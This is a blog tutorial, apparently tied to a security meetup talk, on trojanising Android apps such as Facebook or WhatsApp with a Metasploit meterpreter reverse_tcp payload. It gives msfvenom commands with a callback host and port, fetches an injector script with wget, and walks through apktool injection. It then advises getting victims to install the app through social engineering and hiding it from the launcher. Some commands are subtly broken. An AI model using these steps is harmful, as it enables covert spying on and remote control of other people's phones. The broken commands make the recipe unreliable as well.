How to inject malicious payloads to android application

Do you have a smartphone? Do you use apps? Well, you are under attack. This tutorial will guide you through how easy it is to inject malicious payloads to well-established applications and use them to spy on remote devices. This accompanies the talk I gave on Colombo Security Meetup.

Disclaimer: This is strictly for educational purposes only. I can not and will not be responsible for any damage caused using any of these methods.

Skip ahead if you want to get to the tutorial instead of the writeup.

Can mobile phones be hacked?

Mobile phones have lots of capabilities including sending SMS, taking calls as well as taking photos, videos and record audio. Device OS usually exposes most of these functionalities as an API to applications to use. This malicious payload will use that APIs and send these details to a remote intruder via reverse shell. This is similar to writing a custom application to get these details from the mobile phone. The only difference is this is already written and can be used and has a reverse shell which you can use to connect back anytime.

The technique illustrated here is only applicable to Android phones. It uses the standard device API methods to access the functionality exposed by the phone. This method requires attackers installing and malicious versions of an application on the target mobile phone.

Requirements

  • Android phone
  • A machine with a public IP address with Metasploit installed (or via docker).

I will be using Metasploit via Docker.

Find a target application

This will be the application that you are going to inject your malicious payload. You can use any application for this. A good target would be applications Facebook, Instagram as the original application already requires permissions like accessing the camera or it will be legit from the victim’s point of view since you are not requesting any additional permissions. You can download apps from APKMirror or APKPure.com or any other means. The following steps will assume the apk is downloaded and is available as original.apk in the current path.

Generate payload application

The following command will mount the host file system at /tmp/test to the guest system at /tmp/test. msfvenom is used to generate the meterpreter payload as an android application with the LHOST and LPORT.

docker run \
--rm \
-v /tmp/test:/tmp/test \
-it metasploitframework/metasploit-framework \
./msfvenom \
-p android/meterpreter/reverse_tcp \
LHOST=192.168.8.103 \
LPORT=5555 \
-o /tmp/test/exploited.apk

Replace the IP address with the IP address of the machine you will run your handler and the port.

This will generate a bare application that will give access to all the functionality we need via reverse shell. There are other payloads available for Android as well.

Inject into another application

If you distribute this app, almost always this will be detected and prevent you from installing. What you need is another application that users use and inject this application into it. For example, a well-used application like Facebook or Whatsapp can be used as a container application. On the target phone, it will provide the full functionality of the container application and under the hood, it will also set up a meterpreter as well.

If you have Metasploit installed in your local machine, we can try using the msfvenom to inject it as well.

msfvenom \
-p android/meterpreter/reverse_tcp \
LHOST=192.168.8.103 \
LPORT=5555 \
-o /tmp/test/exploited.apk
-x /tmp/test/authentic.apk

If you are using docker this will fail and use the following method instead.

There are a few things involved in injecting a script.

  1. Download the shell script from
wget https://raw.githubusercontent.com/udnisap/apkinjector/master/apkinjector -o /tmp/test/apkinjector

2. Run a container with Java

# Docker with openjdk
docker run \
-v /tmp/test:/tmp/test \
--rm \
-it openjdk bash

3. Inject the payload to the target application

cd /tmp/test
./apktool ./exploited.apk ./authentic.apk

4. The above script might ask few prompts and after that, injected_authenitic.apk will be available in the host machine at /tmp/test/injected_authentic.apk.

Distribute Malicious application

There are number of ways you can use to distribute this app with the victim. If you managed to get hold of the victim’s phone you can simply install this. Typical social engineering pattern is to claim to provide additional functionality or an unlocked feature that is not available in the original application under the normal app store version. In some cases, since some applications are not available in some regions, it can also be a selling point.

If you managed to get the app installed, with the reverse shell you can hide the application from the main menu which will only be visible if the user checks individual apps installed.

Are you a victim?

Well, there is no easy way to figure out all the applications you have are legit applications. But what you can do is simply uninstall all the applications and reinstall applications from the app store.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store